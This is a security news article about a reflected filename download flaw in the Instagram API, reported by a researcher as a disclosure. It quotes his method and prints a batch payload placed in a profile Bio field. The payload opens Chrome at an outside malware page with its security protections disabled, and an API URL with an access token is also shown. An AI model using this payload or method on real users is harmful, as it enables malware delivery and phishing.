Instagram API could be exploited to serve malicious links

A security researcher has discovered a reflected filename download vulnerability affecting the Instagram API that could be exploited to share malicious links.

The security researcher David Sopas from WebSegura has discovered a serious vulnerability in the Instagram API that could be exploited by hackers to post a link to a web resource they manage. By exploiting a reflected filename download bug, the attacker can post a link that points to a malicious file that once downloaded by the user appears to come from a legitimate Instagram domain without raising suspicion.

The reflected filename download bug resides in the public API for the Instagram service, Sopas demonstrated that manipulating the access token from any user’s account and using some other tricks, he could create a malicious file download link that seems to refer a legitimate resource hosted on the Instagram domain.

“This time I found a RFD on Instagram API. No need to add any command on the URL because we will use a persistent reflected field to do that. Like “Bio” field on the user account. What we need? A token. No worries we just need to register a new user to get one,” explained Sopas in post. “Next step: Insert the batch command we want to use in the user account Bio field [and maybe others]. I’ll try to open a Chrome new window with a malicious page disabling most the protections from this browser.”

In order to build the “Reflected part”, Sopas inserted a batch command in the user account Bio field, explaining that probably other fields could be exploited for the same purpose. Then he opened a Chrome new window with a malicious page disabling most the protections from this browser:

“||start chrome websegura.net/malware.htm –disable-web-security –disable-popup-blocking||

The researcher analyzed the Instagram JSON file from the user and manipulated it to realize the “Filename section”.

https://api.instagram.com/v1/users/1750545056?access_token=339779002.4538cdb.fad79bd258364f4992156372fd01069a

{“meta”:{“code”:200},”data”:{“username”:”davidsopas”,”bio”:”\”||start chrome websegura.net\/malware.htm –disable-web-security –disable-popup-blocking||”,”website”:”http:\/\/websegura.net”,”profile_picture”:”https:\/\/igcdn-photos-f-a.akamaihd.net\/hphotos-ak-xaf1\/t51.2885-19\/11055505_1374264689564237_952365304_a.jpg”,”full_name”:”David Sopas”,”counts”:{“media”:0,”followed_by”:11,”follows”:3},”id”:”1750545056″}}

The attach method works only with specific browsers (Chrome, Opera, Chrome for Android, the Android stock browser and Firefox) due to the presence of restriction for the “Filename section.”

Sopas used a specific filename for his attack, the overall link built by the researcher can then be sent to the victim’s Instagram message. Below the video proof of concept for the attack:

The possible attack scenarios hypothesized by Sopas are:

1. Malicious user posts a new message to all his Instagram friends linking to a specially crafted page
2. Victims clicks on the link and checks that the file is store on Instagram servers and runs it
3. Victim has been infected with malware

Such kind of attacks is very insidious, the exploitation of a reflected filename download vulnerability in a phishing campaign could dramatically improve the efficiency of the attack.

“Many companies still don’t understand that RFD is very dangerous and combined with other attacks like phishing or spam it could lead to massive damage,” Sopas said via email. ” “[Imagine] a phishing campaign where the link of the email is really from Instagram?”

Pierluigi Paganini

(Security Affairs –  mobile,   Instagram)